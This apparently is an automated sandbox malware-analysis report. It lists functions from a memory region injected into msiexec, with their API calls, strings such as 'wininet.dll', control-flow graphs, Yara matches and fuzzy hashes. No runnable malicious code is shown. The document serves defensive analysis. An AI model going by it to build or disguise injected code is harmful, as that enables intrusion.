                      • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                      • Instruction Fuzzy Hash: 15F0BDB2204208AFCB48CF88DC85EEB77ADAF8C754F158248BA1D97241C630E8118BA4
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 006DA3FB, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 38filenativeCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 293 6da3fb-6da449 call 6daf50 NtReadFile
                      APIs
                      • NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,!Jm,FFFFFFFF,?,bMm,?,00000000), ref: 006DA445
                      Strings
                      Memory Dump Source
                      • Source File: 00000007.00000002.556861627.00000000006C0000.00000040.00020000.sdmp, Offset: 006C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_6c0000_msiexec.jbxd
                      Yara matches
                      Similarity
                      • API ID: FileRead
                      • String ID: !Jm
                      • API String ID: 2738559852-4284174255
                      • Opcode ID: 681378be82cb75fca8b1af601ef411f883547eab9a2786295c328b7fc403c216
                      • Instruction ID: b29a28434e1a96149682683bea74cf6940dc547dd69a11b52082b816f127c245
                      • Opcode Fuzzy Hash: 681378be82cb75fca8b1af601ef411f883547eab9a2786295c328b7fc403c216
                      • Instruction Fuzzy Hash: EBF092B6200208AFCB14DF89DC91EEB77A9EF8C754F168259FA1D97245D630E911CBA0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 006DA400, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36filenativeCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 296 6da400-6da416 297 6da41c-6da449 NtReadFile 296->297 298 6da417 call 6daf50 296->298 298->297
                      APIs
                      • NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,!Jm,FFFFFFFF,?,bMm,?,00000000), ref: 006DA445
                      Strings
                      Memory Dump Source
                      • Source File: 00000007.00000002.556861627.00000000006C0000.00000040.00020000.sdmp, Offset: 006C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_6c0000_msiexec.jbxd
                      Yara matches
                      Similarity
                      • API ID: FileRead
                      • String ID: !Jm
                      • API String ID: 2738559852-4284174255
                      • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                      • Instruction ID: 9775cb961544216980d021f11180c78e3c425faed164cd7f673ad31af02f7bb9
                      • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                      • Instruction Fuzzy Hash: 09F0B7B2200208AFCB14DF89DC81EEB77ADEF8C754F158249BE1D97245D630E811CBA4
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 006DA47B, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24nativeCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 302 6da47b-6da4a9 call 6daf50 NtClose
                      APIs
                      • NtClose.NTDLL(@Mm,?,?,006D4D40,00000000,FFFFFFFF), ref: 006DA4A5
                      Strings
                      Memory Dump Source
                      • Source File: 00000007.00000002.556861627.00000000006C0000.00000040.00020000.sdmp, Offset: 006C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_6c0000_msiexec.jbxd
                      Yara matches
                      Similarity
                      • API ID: Close
                      • String ID: @Mm
                      • API String ID: 3535843008-4178540671
                      • Opcode ID: ebc51a09435a68d2cc7833ce378eed4e2059f018e97a588cf6071ab07bbb4f1f
                      • Instruction ID: a24dd39c748159f0d9778a6b94d63d0b9e09d1f2276143c4559542e4f6830571
                      • Opcode Fuzzy Hash: ebc51a09435a68d2cc7833ce378eed4e2059f018e97a588cf6071ab07bbb4f1f
                      • Instruction Fuzzy Hash: D0E08C75600200ABD720DFE9CC86EEB7B68EF84364F108199BA1DEB242C630A50086A0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 006DA480, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20nativeCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 308 6da480-6da496 309 6da49c-6da4a9 NtClose 308->309 310 6da497 call 6daf50 308->310 310->309
                      APIs
                      • NtClose.NTDLL(@Mm,?,?,006D4D40,00000000,FFFFFFFF), ref: 006DA4A5
                      Strings
                      Memory Dump Source
                      • Source File: 00000007.00000002.556861627.00000000006C0000.00000040.00020000.sdmp, Offset: 006C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_6c0000_msiexec.jbxd
                      Yara matches
                      Similarity
                      • API ID: Close
                      • String ID: @Mm
                      • API String ID: 3535843008-4178540671
                      • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                      • Instruction ID: dcbdcd1dcca5e63616a7ffc4cda959d4bdbcdf9d9ae85e3075a0c99f86960bdf
                      • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                      • Instruction Fuzzy Hash: 31D01776600214ABD710EBD8CC85EA77BADEF48760F158499BA1C9B242C530FA0086E0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 046E9540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000007.00000002.562611430.0000000004680000.00000040.00000001.sdmp, Offset: 04680000, based on PE: true
                      • Associated: 00000007.00000002.562806022.000000000479B000.00000040.00000001.sdmp Download File
                      • Associated: 00000007.00000002.562834721.000000000479F000.00000040.00000001.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_4680000_msiexec.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: 45b89a27e8dbf47994eb576501a14debf3329f5a0f18e96380c2502e9f353eae
                      • Instruction ID: 701755cc18b633769cb2b9b73cde0f337d341db8eecfab67ed3f69b1f1914544
                      • Opcode Fuzzy Hash: 45b89a27e8dbf47994eb576501a14debf3329f5a0f18e96380c2502e9f353eae
                      • Instruction Fuzzy Hash: 149002A5211000032105A9590B05507004A97D5395352C021F2416550CF661E8617161
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 046E95D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000007.00000002.562611430.0000000004680000.00000040.00000001.sdmp, Offset: 04680000, based on PE: true
                      • Associated: 00000007.00000002.562806022.000000000479B000.00000040.00000001.sdmp Download File
                      • Associated: 00000007.00000002.562834721.000000000479F000.00000040.00000001.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_4680000_msiexec.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: 49b62616f4a15b9a304cfa465f72238da85f459e4cc9e3b0b5732999674a455a
                      • Instruction ID: 608e69b45a5b9e783f4a6952341a778410682b7f111c7d5e8a20437f7a077aac
                      • Opcode Fuzzy Hash: 49b62616f4a15b9a304cfa465f72238da85f459e4cc9e3b0b5732999674a455a
                      • Instruction Fuzzy Hash: AF9002E120200003610575594815616400E97E0245B52C021E2415590DE565E8917165
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 046E96E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000007.00000002.562611430.0000000004680000.00000040.00000001.sdmp, Offset: 04680000, based on PE: true
                      • Associated: 00000007.00000002.562806022.000000000479B000.00000040.00000001.sdmp Download File
                      • Associated: 00000007.00000002.562834721.000000000479F000.00000040.00000001.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_4680000_msiexec.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: 438b373f1de9633bf2b50c9967af71df5d9aa0b0e4369857648b61f24f617e66
                      • Instruction ID: 139d930b6df246e822feaa3a3c5fdd4790f25ab13989cc3a280b31808ca00049
                      • Opcode Fuzzy Hash: 438b373f1de9633bf2b50c9967af71df5d9aa0b0e4369857648b61f24f617e66
                      • Instruction Fuzzy Hash: 6B9002B120108802F1106559880574A000997D0345F56C411A5825658DA6D5E8917161
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 046E96D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000007.00000002.562611430.0000000004680000.00000040.00000001.sdmp, Offset: 04680000, based on PE: true
                      • Associated: 00000007.00000002.562806022.000000000479B000.00000040.00000001.sdmp Download File
                      • Associated: 00000007.00000002.562834721.000000000479F000.00000040.00000001.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_4680000_msiexec.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: 29f56d36c92927b9e5338b43fcd401ce435bc34e00942ffbe70249ad995d688a
                      • Instruction ID: 3b8d35fa37cdf782f5e04e86a7002c25ca7d43f4fb963eb832bf14ff51c42afb
                      • Opcode Fuzzy Hash: 29f56d36c92927b9e5338b43fcd401ce435bc34e00942ffbe70249ad995d688a
                      • Instruction Fuzzy Hash: CA9002B120100842F10065594805B46000997E0345F52C016A1525654DA655E8517561
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 046E9710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000007.00000002.562611430.0000000004680000.00000040.00000001.sdmp, Offset: 04680000, based on PE: true
                      • Associated: 00000007.00000002.562806022.000000000479B000.00000040.00000001.sdmp Download File
                      • Associated: 00000007.00000002.562834721.000000000479F000.00000040.00000001.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_4680000_msiexec.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: 81b29ae22e5e9b56f2c53cc3c6182089fe6ce32b628a3e3114f7215b0a6fb852
                      • Instruction ID: 5adac3b7305a5b04e1582856d42fd70b00e397e623b0347c8756bfecee017673
                      • Opcode Fuzzy Hash: 81b29ae22e5e9b56f2c53cc3c6182089fe6ce32b628a3e3114f7215b0a6fb852
                      • Instruction Fuzzy Hash: 889002B120100402F10069995809646000997E0345F52D011A6425555EE6A5E8917171
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 046E9FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000007.00000002.562611430.0000000004680000.00000040.00000001.sdmp, Offset: 04680000, based on PE: true
                      • Associated: 00000007.00000002.562806022.000000000479B000.00000040.00000001.sdmp Download File
                      • Associated: 00000007.00000002.562834721.000000000479F000.00000040.00000001.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_4680000_msiexec.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: 9ee2b7b172c0d4f054d0eca7c706441e3e02b1e8dd5990943373a44981c6433c
                      • Instruction ID: 5a01b454ac8b314ca139f0ce5cfa264a3c96c14956bd40d3f1819c50916afefb
                      • Opcode Fuzzy Hash: 9ee2b7b172c0d4f054d0eca7c706441e3e02b1e8dd5990943373a44981c6433c
                      • Instruction Fuzzy Hash: 2A9002B131114402F11065598805706000997D1245F52C411A1C25558DA6D5E8917162
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 046E9780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000007.00000002.562611430.0000000004680000.00000040.00000001.sdmp, Offset: 04680000, based on PE: true
                      • Associated: 00000007.00000002.562806022.000000000479B000.00000040.00000001.sdmp Download File
                      • Associated: 00000007.00000002.562834721.000000000479F000.00000040.00000001.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_4680000_msiexec.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: 793718b3fddbe17b01d569d92d156eacf7a53241c34af9d56159918275fce1d9
                      • Instruction ID: 744b53547fcc079427f8ee883b8be39d7cb3fe9293af88a1668cb4377b8583c4
                      • Opcode Fuzzy Hash: 793718b3fddbe17b01d569d92d156eacf7a53241c34af9d56159918275fce1d9
                      • Instruction Fuzzy Hash: 909002A921300002F1807559580960A000997D1246F92D415A1416558CE955E8697361
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 046E9860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000007.00000002.562611430.0000000004680000.00000040.00000001.sdmp, Offset: 04680000, based on PE: true
                      • Associated: 00000007.00000002.562806022.000000000479B000.00000040.00000001.sdmp Download File
                      • Associated: 00000007.00000002.562834721.000000000479F000.00000040.00000001.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_4680000_msiexec.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: 67f7802a8b29f5264a923aeba738f698e742c20e1780f6d91165a91e145ad04c
                      • Instruction ID: 2c0374a04326515e49cc66e2c41d20fde540834c7acdf5cddb1ab99afa9ff14d
                      • Opcode Fuzzy Hash: 67f7802a8b29f5264a923aeba738f698e742c20e1780f6d91165a91e145ad04c
                      • Instruction Fuzzy Hash: 9A9002B120100413F11165594905707000D97D0285F92C412A1825558DB696E952B161
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 046E9840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000007.00000002.562611430.0000000004680000.00000040.00000001.sdmp, Offset: 04680000, based on PE: true
                      • Associated: 00000007.00000002.562806022.000000000479B000.00000040.00000001.sdmp Download File
                      • Associated: 00000007.00000002.562834721.000000000479F000.00000040.00000001.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_4680000_msiexec.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: 12a1669d04d2a234116f5211121a840ed010f8395ad9719dd19fd194b5e7bc3e
                      • Instruction ID: cf9914d62a11b9e4c4a2dcdaac100a9f31bbc05614a12149961a78b408e35ef0
                      • Opcode Fuzzy Hash: 12a1669d04d2a234116f5211121a840ed010f8395ad9719dd19fd194b5e7bc3e
                      • Instruction Fuzzy Hash: 079002A1242041527545B5594805507400AA7E0285792C012A2815950CA566F856F661
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 046E9910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000007.00000002.562611430.0000000004680000.00000040.00000001.sdmp, Offset: 04680000, based on PE: true
                      • Associated: 00000007.00000002.562806022.000000000479B000.00000040.00000001.sdmp Download File
                      • Associated: 00000007.00000002.562834721.000000000479F000.00000040.00000001.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_4680000_msiexec.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: 562e5ddb1db5c1b64270c70c78957b3c7f04562e88735c8beb7ac608959ee791
                      • Instruction ID: 3782334071c72488d5648e52f8a253fe4faec7600ffa16451d1fdb3a2502d191
                      • Opcode Fuzzy Hash: 562e5ddb1db5c1b64270c70c78957b3c7f04562e88735c8beb7ac608959ee791
                      • Instruction Fuzzy Hash: 4C9002F120100402F14075594805746000997D0345F52C011A6465554EA699EDD576A5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 046E99A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000007.00000002.562611430.0000000004680000.00000040.00000001.sdmp, Offset: 04680000, based on PE: true
                      • Associated: 00000007.00000002.562806022.000000000479B000.00000040.00000001.sdmp Download File
                      • Associated: 00000007.00000002.562834721.000000000479F000.00000040.00000001.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_4680000_msiexec.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: fc9cc350c8660e9831d6c15338765859b6fbc34e7bcd8c077e56d9e2aa6466d1
                      • Instruction ID: 8f3d1576040acb50cbad71cc4e86335de1bba7552386759ae3538e4a63fc12fb
                      • Opcode Fuzzy Hash: fc9cc350c8660e9831d6c15338765859b6fbc34e7bcd8c077e56d9e2aa6466d1
                      • Instruction Fuzzy Hash: F49002E134100442F10065594815B060009D7E1345F52C015E2465554DA659EC527166
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 046E9A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000007.00000002.562611430.0000000004680000.00000040.00000001.sdmp, Offset: 04680000, based on PE: true
                      • Associated: 00000007.00000002.562806022.000000000479B000.00000040.00000001.sdmp Download File
                      • Associated: 00000007.00000002.562834721.000000000479F000.00000040.00000001.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_4680000_msiexec.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: 2f6e7f23b7cbab256eff379144fe0db8b10b27f7f817133b5814456d0abca08d
                      • Instruction ID: dedb3c9ff9ce033d42f4832cd33285753a39c2dadb03fc25bafeb0d8a19c0776
                      • Opcode Fuzzy Hash: 2f6e7f23b7cbab256eff379144fe0db8b10b27f7f817133b5814456d0abca08d
                      • Instruction Fuzzy Hash: 709002A121180042F20069694C15B07000997D0347F52C115A1555554CE955E8617561
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 006D9070, Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 90sleepCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 243 6d9070-6d909f 244 6d90ab-6d90b2 243->244 245 6d90a6 call 6dbd30 243->245 246 6d918c-6d9192 244->246 247 6d90b8-6d9108 call 6dbe00 call 6cace0 call 6d4e40 244->247 245->244 254 6d9110-6d9121 Sleep 247->254 255 6d9186-6d918a 254->255 256 6d9123-6d9129 254->256 255->246 255->254 257 6d912b-6d9151 call 6d8c90 256->257 258 6d9153-6d9173 256->258 260 6d9179-6d917c 257->260 258->260 261 6d9174 call 6d8ea0 258->261 260->255 261->260
                      APIs
                      • Sleep.KERNELBASE(000007D0), ref: 006D9118
                      Strings
                      Memory Dump Source
                      • Source File: 00000007.00000002.556861627.00000000006C0000.00000040.00020000.sdmp, Offset: 006C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_6c0000_msiexec.jbxd
                      Yara matches
                      Similarity
                      • API ID: Sleep
                      • String ID: : $net.dll$wininet.dll
                      • API String ID: 3472027048-1278029986
                      • Opcode ID: 77791a317c1ad712df139d13927c17679717c21c9eda19342d1fe3dec0682886
                      • Instruction ID: deae5710dccfb2f2a44323806fcbd1c436ecf31bf6c4dc20575cbcdaba27bcff
                      • Opcode Fuzzy Hash: 77791a317c1ad712df139d13927c17679717c21c9eda19342d1fe3dec0682886
                      • Instruction Fuzzy Hash: A23170B6900645BBC724DF64CC89FA7B7B9BB48B01F10851EF62A5B345DA30A550CBA8
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 006D9066, Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 88sleepCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 263 6d9066-6d9069 264 6d907f-6d90b2 call 6dbd30 263->264 265 6d906b 263->265 270 6d918c-6d9192 264->270 271 6d90b8-6d9108 call 6dbe00 call 6cace0 call 6d4e40 264->271 266 6d906d-6d907b 265->266 267 6d9061-6d9065 265->267 266->264 278 6d9110-6d9121 Sleep 271->278 279 6d9186-6d918a 278->279 280 6d9123-6d9129 278->280 279->270 279->278 281 6d912b-6d9151 call 6d8c90 280->281 282 6d9153-6d9173 280->282 284 6d9179-6d917c 281->284 282->284 285 6d9174 call 6d8ea0 282->285 284->279 285->284
                      APIs
                      • Sleep.KERNELBASE(000007D0), ref: 006D9118
                      Strings
                      Memory Dump Source
                      • Source File: 00000007.00000002.556861627.00000000006C0000.00000040.00020000.sdmp, Offset: 006C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_6c0000_msiexec.jbxd
                      Yara matches
                      Similarity
                      • API ID: Sleep
                      • String ID: : $net.dll$wininet.dll
                      • API String ID: 3472027048-1278029986
                      • Opcode ID: 8b3994d0265157d9a7cb0f374f2cb7ede4acdbdaa21268cfcc1f567c57777dac
                      • Instruction ID: e5bf98fcdd55708c860dcd25184fa04ac0305336f16aaca396ac1583f8367e01
                      • Opcode Fuzzy Hash: 8b3994d0265157d9a7cb0f374f2cb7ede4acdbdaa21268cfcc1f567c57777dac
                      • Instruction Fuzzy Hash: 2731D171A40245BBC754DF64CC85BA7B7B5AB48701F10805FEA2DAB346D670A560CBE4
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 006DA652, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 26memoryCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 299 6da652-6da676 300 6da67c-6da691 RtlFreeHeap 299->300 301 6da677 call 6daf50 299->301 301->300
                      APIs
                      • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,006C3AF8), ref: 006DA68D
                      Strings
                      Memory Dump Source
                      • Source File: 00000007.00000002.556861627.00000000006C0000.00000040.00020000.sdmp, Offset: 006C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_6c0000_msiexec.jbxd
                      Yara matches
                      Similarity
                      • API ID: FreeHeap
                      • String ID: .z`
                      • API String ID: 3298025750-1441809116
                      • Opcode ID: 0713bdf17e3910512d3208d684b3a1ba0014d390962b5878974628b133758230
                      • Instruction ID: fe7f2e445b85b4b8500b4210abe1e473996bb3785ba9e021c2bb30ff8a1c5ad6
                      • Opcode Fuzzy Hash: 0713bdf17e3910512d3208d684b3a1ba0014d390962b5878974628b133758230
                      • Instruction Fuzzy Hash: F3E06DB12142046FD714DF98DC44EAB3768AF48310F008589F90C5B342C630ED14CBA0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 006DA660, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 305 6da660-6da691 call 6daf50 RtlFreeHeap
                      APIs
                      • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,006C3AF8), ref: 006DA68D
                      Strings
                      Memory Dump Source
                      • Source File: 00000007.00000002.556861627.00000000006C0000.00000040.00020000.sdmp, Offset: 006C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_6c0000_msiexec.jbxd
                      Yara matches
                      Similarity
                      • API ID: FreeHeap
                      • String ID: .z`
                      • API String ID: 3298025750-1441809116
                      • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                      • Instruction ID: a6d944c3ba384656978eb32fe818dd6edba4cf0e35c67e629ac04e0503a5dee5
                      • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                      • Instruction Fuzzy Hash: A5E012B1200208ABDB18EF99CC49EA777ADEF88750F018599BA1C5B242C630E9108AB0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 006C8309, Relevance: 3.1, APIs: 2, Instructions: 56threadwindowCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 311 6c8309-6c830b 312 6c830d-6c8336 call 6dbe50 call 6dc9f0 311->312 313 6c8339-6c835a call 6cace0 call 6d4e40 311->313 312->313 322 6c835c-6c836e PostThreadMessageW 313->322 323 6c838e-6c8392 313->323 324 6c838d 322->324 325 6c8370-6c838b call 6ca470 PostThreadMessageW 322->325 324->323 325->324
                      APIs
                      • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 006C836A
                      • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 006C838B
                      Memory Dump Source
                      • Source File: 00000007.00000002.556861627.00000000006C0000.00000040.00020000.sdmp, Offset: 006C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_6c0000_msiexec.jbxd
                      Yara matches
                      Similarity
                      • API ID: MessagePostThread
                      • String ID:
                      • API String ID: 1836367815-0
                      • Opcode ID: 1f319cee60a23e887c00d79d1caf730bd7e9068f14c3818fca6188a9136e9a33
                      • Instruction ID: fc694f0e5449d53410c17aaee59c368a52e5f1ae1b7bc38ff1c1888fd26cf505
                      • Opcode Fuzzy Hash: 1f319cee60a23e887c00d79d1caf730bd7e9068f14c3818fca6188a9136e9a33
                      • Instruction Fuzzy Hash: 4E01B971E402587BE721A6948C43FFE775DAB00B51F04411DFF04FB1C1DAA4690546E5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 006C8310, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 328 6c8310-6c831f 329 6c8328-6c835a call 6dc9f0 call 6cace0 call 6d4e40 328->329 330 6c8323 call 6dbe50 328->330 338 6c835c-6c836e PostThreadMessageW 329->338 339 6c838e-6c8392 329->339 330->329 340 6c838d 338->340 341 6c8370-6c838b call 6ca470 PostThreadMessageW 338->341 340->339 341->340
                      APIs
                      • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 006C836A
                      • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 006C838B
                      Memory Dump Source
                      • Source File: 00000007.00000002.556861627.00000000006C0000.00000040.00020000.sdmp, Offset: 006C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_6c0000_msiexec.jbxd
                      Yara matches
                      Similarity
                      • API ID: MessagePostThread
                      • String ID:
                      • API String ID: 1836367815-0
                      • Opcode ID: 3172d27be0b016439e5481d8b21c313a41ffbcab7864ad54bb0489d0eefa33a4
                      • Instruction ID: 61ee2b01056d2a8eef33c4ad8fbb9245d772cfe612ff43751771e6b8d676968c
                      • Opcode Fuzzy Hash: 3172d27be0b016439e5481d8b21c313a41ffbcab7864ad54bb0489d0eefa33a4
                      • Instruction Fuzzy Hash: EC018831A402187BE721A6949C03FFE775D9B40F51F05411DFF04BB2C1D694690546EA
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 006CACE0, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                      Download Yara Rule
                      APIs
                      • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 006CAD52
                      Memory Dump Source
                      • Source File: 00000007.00000002.556861627.00000000006C0000.00000040.00020000.sdmp, Offset: 006C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_6c0000_msiexec.jbxd
                      Yara matches
                      Similarity
                      • API ID: Load
                      • String ID:
                      • API String ID: 2234796835-0
                      • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                      • Instruction ID: 41df8d017d7b62095b3fe8ae3fffda565ea599fa9f5c0eb8e15c97c9d5d00771
                      • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                      • Instruction Fuzzy Hash: 7C011EB5D4020DABDF10EAE4DD46FEDB3B99F54308F108199E90997241F631EB54CB92
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 006DA6D0, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                      Download Yara Rule
                      APIs
                      • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 006DA724
                      Memory Dump Source
                      • Source File: 00000007.00000002.556861627.00000000006C0000.00000040.00020000.sdmp, Offset: 006C0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_6c0000_msiexec.jbxd
                      Yara matches
                      Similarity
                      • API ID: CreateInternalProcess
                      • String ID:
                      • API String ID: 2186235152-0
